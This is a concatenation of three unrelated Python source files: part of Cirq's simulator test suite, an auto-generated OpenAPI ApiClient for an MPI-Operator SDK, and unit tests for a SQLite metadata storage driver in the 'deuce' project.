circuit = mock.Mock(cirq.Circuit)
param_resolver = mock.Mock(cirq.ParamResolver)
param_resolver.param_dict = {}
qubit_order = mock.Mock(cirq.QubitOrder)
result = simulator.simulate(
program=circuit, param_resolver=param_resolver, qubit_order=qubit_order, initial_state=2
)
np.testing.assert_equal(result.measurements['a'], [True, True])
np.testing.assert_equal(result.measurements['b'], [True, False])
assert set(result.measurements.keys()) == {'a', 'b'}
assert result.params == param_resolver
np.testing.assert_equal(result._final_simulator_state, final_simulator_state)
@mock.patch.multiple(
SimulatesIntermediateStateImpl, __abstractmethods__=set(), simulate_moment_steps=mock.Mock()
)
def test_intermediate_sweeps():
simulator = SimulatesIntermediateStateImpl()
final_state = np.array([1, 0, 0, 0])
def steps(*args, **kwargs):
result = mock.Mock()
result.measurements = {'a': np.array([True, True])}
result._simulator_state.return_value = final_state
yield result
simulator.simulate_moment_steps.side_effect = steps
circuit = mock.Mock(cirq.Circuit)
param_resolvers = [mock.Mock(cirq.ParamResolver), mock.Mock(cirq.ParamResolver)]
for resolver in param_resolvers:
resolver.param_dict = {}
qubit_order = mock.Mock(cirq.QubitOrder)
results = simulator.simulate_sweep(
program=circuit, params=param_resolvers, qubit_order=qubit_order, initial_state=2
)
final_step_result = FakeStepResult(final_state=final_state)
expected_results = [
cirq.SimulationTrialResult(
measurements={'a': np.array([True, True])},
params=param_resolvers[0],
final_step_result=final_step_result,
),
cirq.SimulationTrialResult(
measurements={'a': np.array([True, True])},
params=param_resolvers[1],
final_step_result=final_step_result,
),
]
assert results == expected_results
def test_step_sample_measurement_ops():
q0, q1, q2 = cirq.LineQubit.range(3)
measurement_ops = [cirq.measure(q0, q1), cirq.measure(q2)]
step_result = FakeStepResult(ones_qubits=[q1])
measurements = step_result.sample_measurement_ops(measurement_ops)
np.testing.assert_equal(measurements, {'0,1': [[False, True]], '2': [[False]]})
def test_step_sample_measurement_ops_repetitions():
q0, q1, q2 = cirq.LineQubit.range(3)
measurement_ops = [cirq.measure(q0, q1), cirq.measure(q2)]
step_result = FakeStepResult(ones_qubits=[q1])
measurements = step_result.sample_measurement_ops(measurement_ops, repetitions=3)
np.testing.assert_equal(measurements, {'0,1': [[False, True]] * 3, '2': [[False]] * 3})
def test_step_sample_measurement_ops_invert_mask():
q0, q1, q2 = cirq.LineQubit.range(3)
measurement_ops = [
cirq.measure(q0, q1, invert_mask=(True,)),
cirq.measure(q2, invert_mask=(False,)),
]
step_result = FakeStepResult(ones_qubits=[q1])
measurements = step_result.sample_measurement_ops(measurement_ops)
np.testing.assert_equal(measurements, {'0,1': [[True, True]], '2': [[False]]})
def test_step_sample_measurement_ops_no_measurements():
step_result = FakeStepResult(ones_qubits=[])
measurements = step_result.sample_measurement_ops([])
assert measurements == {}
def test_step_sample_measurement_ops_not_measurement():
q0 = cirq.LineQubit(0)
step_result = FakeStepResult(ones_qubits=[q0])
with pytest.raises(ValueError, match='MeasurementGate'):
step_result.sample_measurement_ops([cirq.X(q0)])
def test_step_sample_measurement_ops_repeated_qubit():
q0, q1, q2 = cirq.LineQubit.range(3)
step_result = FakeStepResult(ones_qubits=[q0])
with pytest.raises(ValueError, match='Measurement key 0 repeated'):
step_result.sample_measurement_ops(
[cirq.measure(q0), cirq.measure(q1, q2), cirq.measure(q0)]
)
def test_simulation_trial_result_equality():
eq = cirq.testing.EqualsTester()
final_step_result = FakeStepResult(final_state=())
eq.add_equality_group(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({}), measurements={}, final_step_result=final_step_result
),
cirq.SimulationTrialResult(
params=cirq.ParamResolver({}), measurements={}, final_step_result=final_step_result
),
)
eq.add_equality_group(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={},
final_step_result=final_step_result,
)
)
eq.add_equality_group(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={'m': np.array([1])},
final_step_result=final_step_result,
)
)
final_step_result._final_state = (0, 1)
eq.add_equality_group(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={'m': np.array([1])},
final_step_result=final_step_result,
)
)
def test_simulation_trial_result_repr():
final_step_result = FakeStepResult(final_state=(0, 1))
assert repr(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={'m': np.array([1])},
final_step_result=final_step_result,
)
) == (
"cirq.SimulationTrialResult("
"params=cirq.ParamResolver({'s': 1}), "
"measurements={'m': array([1])}, "
"final_simulator_state=(0, 1))"
)
def test_simulation_trial_result_str():
final_step_result = FakeStepResult(final_state=(0, 1))
assert (
str(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={},
final_step_result=final_step_result,
)
)
== '(no measurements)'
)
assert (
str(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={'m': np.array([1])},
final_step_result=final_step_result,
)
)
== 'm=1'
)
assert (
str(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={'m': np.array([1, 2, 3])},
final_step_result=final_step_result,
)
)
== 'm=123'
)
assert (
str(
cirq.SimulationTrialResult(
params=cirq.ParamResolver({'s': 1}),
measurements={'m': np.array([9, 10, 11])},
final_step_result=final_step_result,
)
)
== 'm=9 10 11'
)
def test_pretty_print():
result = cirq.SimulationTrialResult(cirq.ParamResolver(), {}, np.array([1]))
# Test Jupyter console output from
class FakePrinter:
def __init__(self):
self.text_pretty = ''
def text(self, to_print):
self.text_pretty += to_print
p = FakePrinter()
result._repr_pretty_(p, False)
assert p.text_pretty == '(no measurements)'
# Test cycle handling
p = FakePrinter()
result._repr_pretty_(p, True)
assert p.text_pretty == 'SimulationTrialResult(...)'
@duet.sync
async def test_async_sample():
m = {'mock': np.array([[[0]], [[1]]])}
simulator = FakeSimulatesSamples(m)
q = cirq.LineQubit(0)
f = simulator.run_async(cirq.Circuit(cirq.measure(q)), repetitions=10)
result = await f
np.testing.assert_equal(result.records, m)
def test_simulation_trial_result_qubit_map():
q = cirq.LineQubit.range(2)
result = cirq.Simulator().simulate(cirq.Circuit([cirq.CZ(q[0], q[1])]))
assert result.qubit_map == {q[0]: 0, q[1]: 1}
result = cirq.DensityMatrixSimulator().simulate(cirq.Circuit([cirq.CZ(q[0], q[1])]))
assert result.qubit_map == {q[0]: 0, q[1]: 1}
def test_sample_repeated_measurement_keys():
q = cirq.LineQubit.range(2)
circuit = cirq.Circuit()
circuit.append(
[
cirq.measure(q[0], key='a'),
cirq.measure(q[1], key='a'),
cirq.measure(q[0], key='b'),
cirq.measure(q[1], key='b'),
]
)
result = cirq.sample(circuit)
assert len(result.records['a']) == 1
assert len(result.records['b']) == 1
assert len(result.records['a'][0]) == 2
assert len(result.records['b'][0]) == 2
def test_simulate_with_invert_mask():
class PlusGate(cirq.Gate):
"""A qudit gate that increments a qudit state mod its dimension."""
def __init__(self, dimension, increment=1):
self.dimension = dimension
self.increment = increment % dimension
def _qid_shape_(self):
return (self.dimension,)
def _unitary_(self):
inc = (self.increment - 1) % self.dimension + 1
u = np.empty((self.dimension, self.dimension))
u[inc:] = np.eye(self.dimension)[:-inc]
u[:inc] = np.eye(self.dimension)[-inc:]
return u
q0, q1, q2, q3, q4 = cirq.LineQid.for_qid_shape((2, 3, 3, 3, 4))
c = cirq.Circuit(
PlusGate(2, 1)(q0),
PlusGate(3, 1)(q2),
PlusGate(3, 2)(q3),
PlusGate(4, 3)(q4),
cirq.measure(q0, q1, q2, q3, q4, key='a', invert_mask=(True,) * 4),
)
assert np.all(cirq.Simulator().run(c).measurements['a'] == [[0, 1, 0, 2, 3]])
def test_monte_carlo_on_unknown_channel():
class Reset11To00(cirq.Gate):
def num_qubits(self) -> int:
return 2
def _kraus_(self):
return [
np.eye(4) - cirq.one_hot(index=(3, 3), shape=(4, 4), dtype=np.complex64),
cirq.one_hot(index=(0, 3), shape=(4, 4), dtype=np.complex64),
]
for k in range(4):
out = cirq.Simulator().simulate(
cirq.Circuit(Reset11To00().on(*cirq.LineQubit.range(2))),
initial_state=k,
)
np.testing.assert_allclose(
out.state_vector(), cirq.one_hot(index=k % 3, shape=4, dtype=np.complex64), atol=1e-8
)
def test_iter_definitions():
dummy_trial_result = SimulationTrialResult(
params={}, measurements={}, final_step_result=FakeStepResult(final_state=[])
)
class FakeNonIterSimulatorImpl(
SimulatesAmplitudes,
SimulatesExpectationValues,
SimulatesFinalState,
):
"""A class which defines the non-Iterator simulator API methods.
After v0.12, simulators are expected to implement the *_iter methods.
"""
def compute_amplitudes_sweep(
self,
program: 'cirq.AbstractCircuit',
bitstrings: Sequence[int],
params: study.Sweepable,
qubit_order: cirq.QubitOrderOrList = cirq.QubitOrder.DEFAULT,
) -> Sequence[Sequence[complex]]:
return [[1.0]]
def simulate_expectation_values_sweep(
self,
program: 'cirq.AbstractCircuit',
observables: Union['cirq.PauliSumLike', List['cirq.PauliSumLike']],
params: 'study.Sweepable',
qubit_order: cirq.QubitOrderOrList = cirq.QubitOrder.DEFAULT,
initial_state: Any = None,
permit_terminal_measurements: bool = False,
) -> List[List[float]]:
return [[1.0]]
def simulate_sweep(
self,
program: 'cirq.AbstractCircuit',
params: study.Sweepable,
qubit_order: cirq.QubitOrderOrList = cirq.QubitOrder.DEFAULT,
initial_state: Any = None,
) -> List[SimulationTrialResult]:
return [dummy_trial_result]
non_iter_sim = FakeNonIterSimulatorImpl()
q0 = cirq.LineQubit(0)
circuit = cirq.Circuit(cirq.X(q0))
bitstrings = [0b0]
params = {}
assert non_iter_sim.compute_amplitudes_sweep(circuit, bitstrings, params) == [[1.0]]
amp_iter = non_iter_sim.compute_amplitudes_sweep_iter(circuit, bitstrings, params)
assert next(amp_iter) == [1.0]
obs = cirq.X(q0)
assert non_iter_sim.simulate_expectation_values_sweep(circuit, obs, params) == [[1.0]]
ev_iter = non_iter_sim.simulate_expectation_values_sweep_iter(circuit, obs, params)
assert next(ev_iter) == [1.0]
assert non_iter_sim.simulate_sweep(circuit, params) == [dummy_trial_result]
state_iter = non_iter_sim.simulate_sweep_iter(circuit, params)
assert next(state_iter) == dummy_trial_result
def test_missing_iter_definitions():
class FakeMissingIterSimulatorImpl(
SimulatesAmplitudes,
SimulatesExpectationValues,
SimulatesFinalState,
):
"""A class which fails to define simulator methods."""
missing_iter_sim = FakeMissingIterSimulatorImpl()
q0 = cirq.LineQubit(0)
circuit = cirq.Circuit(cirq.X(q0))
bitstrings = [0b0]
params = {}
with pytest.raises(RecursionError):
missing_iter_sim.compute_amplitudes_sweep(circuit, bitstrings, params)
with pytest.raises(RecursionError):
amp_iter = missing_iter_sim.compute_amplitudes_sweep_iter(circuit, bitstrings, params)
next(amp_iter)
obs = cirq.X(q0)
with pytest.raises(RecursionError):
missing_iter_sim.simulate_expectation_values_sweep(circuit, obs, params)
with pytest.raises(RecursionError):
ev_iter = missing_iter_sim.simulate_expectation_values_sweep_iter(circuit, obs, params)
next(ev_iter)
with pytest.raises(RecursionError):
missing_iter_sim.simulate_sweep(circuit, params)
with pytest.raises(RecursionError):
state_iter = missing_iter_sim.simulate_sweep_iter(circuit, params)
next(state_iter)
def test_trial_result_initializer():
with pytest.raises(ValueError, match='Exactly one of'):
_ = SimulationTrialResult(cirq.ParamResolver(), {}, None, None)
with pytest.raises(ValueError, match='Exactly one of'):
_ = SimulationTrialResult(cirq.ParamResolver(), {}, object(), mock.Mock(TStepResult))
| |
# coding: utf-8
"""
mpijob
Python SDK for MPI-Operator # noqa: E501
The version of the OpenAPI document: v2beta1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import atexit
import datetime
from dateutil.parser import parse
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from mpijob.configuration import Configuration
import mpijob.models
from mpijob import rest
from mpijob.exceptions import ApiValueError, ApiException
class ApiClient(object):
"""Generic API client for OpenAPI client library builds.
OpenAPI generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the OpenAPI
templates.
NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
:param pool_threads: The number of threads to use for async requests
to the API. More threads means more concurrent API requests.
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
_pool = None
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None, pool_threads=1):
if configuration is None:
configuration = Configuration.get_default_copy()
self.configuration = configuration
self.pool_threads = pool_threads
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'OpenAPI-Generator/0.1/python'
self.client_side_validation = configuration.client_side_validation
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
if self._pool:
self._pool.close()
self._pool.join()
self._pool = None
if hasattr(atexit, 'unregister'):
atexit.unregister(self.close)
@property
def pool(self):
"""Create thread pool on first request
avoids instantiating unused threadpool for blocking clients.
"""
if self._pool is None:
atexit.register(self.close)
self._pool = ThreadPool(self.pool_threads)
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_types_map=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None, _host=None,
_request_auth=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = post_params if post_params else []
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
post_params.extend(self.files_parameters(files))
# auth setting
self.update_params_for_auth(
header_params, query_params, auth_settings,
request_auth=_request_auth)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
if _host is None:
url = self.configuration.host + resource_path
else:
# use server/host defined in path or operation instead
url = _host + resource_path
try:
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
except ApiException as e:
e.body = e.body.decode('utf-8') if six.PY3 else e.body
raise e
self.last_response = response_data
return_data = response_data
if not _preload_content:
return return_data
response_type = response_types_map.get(response_data.status, None)
if six.PY3 and response_type not in ["file", "bytes"]:
match = None
content_type = response_data.getheader('content-type')
if content_type is not None:
match = re.search(r"charset=([a-zA-Z\-\d]+)[\s\;]?", content_type)
encoding = match.group(1) if match else "utf-8"
response_data.data = response_data.data.decode(encoding)
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is OpenAPI model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `openapi_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.openapi_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(mpijob.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datetime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_types_map=None, auth_settings=None,
async_req=None, _return_http_data_only=None,
collection_formats=None,_preload_content=True,
_request_timeout=None, _host=None, _request_auth=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async_req request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_token: dict, optional
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_types_map, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout, _host,
_request_auth)
return self.pool.apply_async(self.__call_api, (resource_path,
method, path_params,
query_params,
header_params, body,
post_params, files,
response_types_map,
auth_settings,
_return_http_data_only,
collection_formats,
_preload_content,
_request_timeout,
_host, _request_auth))
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ApiValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def files_parameters(self, files=None):
"""Builds form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings,
request_auth=None):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
:param request_auth: if set, the provided settings will
override the token in the configuration.
"""
if not auth_settings:
return
if request_auth:
self._apply_auth_params(headers, querys, request_auth)
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
self._apply_auth_params(headers, querys, auth_setting)
def _apply_auth_params(self, headers, querys, auth_setting):
"""Updates the request parameters based on a single auth_setting
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_setting: auth settings for the endpoint
"""
if auth_setting['in'] == 'cookie':
headers['Cookie'] = auth_setting['value']
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ApiValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "wb") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return an original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datetime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
has_discriminator = False
if (hasattr(klass, 'get_real_child_model')
and klass.discriminator_value_class_map):
has_discriminator = True
if not klass.openapi_types and has_discriminator is False:
return data
kwargs = {}
if (data is not None and
klass.openapi_types is not None and
isinstance(data, (list, dict))):
for attr, attr_type in six.iteritems(klass.openapi_types):
if klass.attribute_map[attr] in data:
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if has_discriminator:
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance
| |
import ddt
from mock import MagicMock
import random
from deuce.tests import V1Base
from deuce.drivers.metadatadriver import MetadataStorageDriver, GapError,\
OverlapError, ConstraintError
from deuce.drivers.sqlite import SqliteStorageDriver
from deuce.drivers import BlockStorageDriver
import deuce
@ddt.ddt
class SqliteStorageDriverTest(V1Base):
def _genstorageid(self, blockid):
return BlockStorageDriver.storage_id(blockid)
def create_driver(self):
return SqliteStorageDriver()
def test_basic_construction(self):
driver = self.create_driver()
def test_geneology(self):
driver = self.create_driver()
assert isinstance(driver, MetadataStorageDriver)
assert isinstance(driver, object)
def test_vault_statistics(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
fileid = self.create_file_id()
num_blocks = 3
# empty vault stats
statistics = driver.get_vault_statistics(vault_id)
main_keys = ('files', 'blocks')
for key in main_keys:
self.assertIn(key, statistics.keys())
self.assertIn('count', statistics[key].keys())
self.assertEqual(statistics[key]['count'], 0)
driver.create_file(vault_id, fileid)
block_ids = [self.create_block_id() for _ in range(num_blocks)]
for block_id in block_ids:
storage_id = self.create_storage_block_id()
blocksize = 1024
driver.register_block(vault_id, block_id, storage_id, blocksize)
stats = driver.get_vault_statistics(vault_id)
self.assertEqual(stats['blocks']['count'], 3)
self.assertEqual(stats['files']['count'], 1)
self.assertEqual(stats['blocks']['bad'], 0)
self.assertEqual(stats['files']['bad'], 0)
offsets = []
for i in range(num_blocks):
offsets.append(i * 1024)
driver.assign_blocks(vault_id, fileid, block_ids, offsets)
driver.finalize_file(vault_id, fileid, file_size=num_blocks * 1024)
for block_id in block_ids:
driver.mark_block_as_bad(vault_id, block_id)
new_stats = driver.get_vault_statistics(vault_id)
self.assertEqual(new_stats['blocks']['count'], 3)
self.assertEqual(new_stats['files']['count'], 1)
self.assertEqual(new_stats['blocks']['bad'], 3)
self.assertEqual(new_stats['files']['bad'], 1)
def test_db_health(self):
driver = self.create_driver()
retval = driver.get_health()
driver.get_health = MagicMock(return_value=str('is not active.'))
retval = driver.get_health()
self.assertEqual(retval, str('is not active.'))
def test_file_crud(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertFalse(driver.has_file(vault_id, file_id))
# Length of Non-existent file is 0
file_length = driver.file_length(vault_id, file_id)
self.assertEqual(file_length, 0)
driver.create_file(vault_id, file_id)
self.assertTrue(driver.has_file(vault_id, file_id))
file_length = driver.file_length(vault_id, file_id)
self.assertEqual(file_length, 0)
data = driver.get_file_data(vault_id, file_id)
driver.delete_file(vault_id, file_id)
self.assertFalse(driver.has_file(vault_id, file_id))
def test_finalize_files(self):
driver = self.create_driver()
vaults = {
self.create_vault_id(): self.create_file_id()
for _ in range(2)
}
block_data = 'a'
block_length = len(block_data)
block_id = 's'
block_offset = 0
for vault_id, file_id in vaults.items():
driver.register_block(vault_id,
block_id,
self._genstorageid(block_id),
block_length)
results = driver.has_blocks(vault_id, block_id)
self.assertEqual(results, [])
driver.assign_blocks(vault_id,
file_id,
[block_id],
[block_offset])
driver.finalize_file(vault_id,
file_id,
block_length)
def test_finalize_empty_file(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
driver.create_file(vault_id, file_id)
self.assertFalse(driver.is_finalized(vault_id, file_id))
driver.finalize_file(vault_id, file_id)
self.assertTrue(driver.is_finalized(vault_id, file_id))
file_length = driver.file_length(vault_id, file_id)
self.assertEqual(file_length, 0)
def test_finalize_nonexistent_file(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertFalse(driver.has_file(vault_id, file_id))
retval = driver.finalize_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
self.assertEqual(file_length, 0)
try:
data = driver.get_file_data(vault_id, file_id)
except:
self.assertTrue(True)
self.assertFalse(driver.has_file(vault_id, file_id))
